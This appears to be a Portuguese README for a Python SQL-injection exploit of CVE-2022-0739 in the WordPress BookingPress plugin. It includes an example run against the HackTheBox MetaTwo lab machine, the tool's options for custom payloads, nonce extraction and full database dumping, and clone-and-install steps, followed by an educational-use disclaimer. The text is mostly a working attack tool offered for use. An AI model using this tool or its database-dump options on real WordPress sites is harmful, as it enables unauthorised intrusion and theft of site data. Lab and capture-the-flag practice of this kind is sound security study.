
Exploit para WP BookingPress (< 1.0.11) baseado no POC do destr4ct.
Minha abordagem do exploit CVE-2022-0739 BookingPress, baseada no POC do destr4ct — apenas mais bonita.
Exemplo de uso contra a máquina MetaTwo do HackTheBox, que hospeda um WordPress com o plugin bookingpress vulnerável (versão 1.0.10).
python booking-sqlinjector.py -u http://metapress.htb -nu http://metapress.htb/events/ -a -o db_dump
usage: booking-sqlinjector.py [-h] -u URL [-o BASENAME] [-p PAYLOAD] [-a] [-v] (-n NONCE | -nu NONCE_URL)
options:
-h, --help show this help message and exit
-u URL, --url URL URL of WordPress server with vulnerable plugin (http://example.domain)
-o BASENAME, --out BASENAME
Output database schema and dump in JSON format
-p PAYLOAD, --payload PAYLOAD
Payload to inject. Should start with ')'
-a, --dump-all Enables whole DB dump
-v, --verbose Enables verbose mode
-n NONCE, --nonce NONCE
Nonce that you got as unauthenticated user
-nu NONCE_URL, --nonce-url NONCE_URL
URL where nonce can be extracted (bookingprss form page)
git clone https://github.com/viardant/CVE-2022-0739
cd CVE-2022-0739
pip install -r requirements.txt
TL:DR; Apenas para fins educacionais, não quebre coisas que você não possui ou não tem permissão para testar. Se você usar este programa para qualquer propósito nefasto, os deuses da cibersegurança podem castigar seu computador com um malware tão devastador que você vai desejar ter comprado um Mac.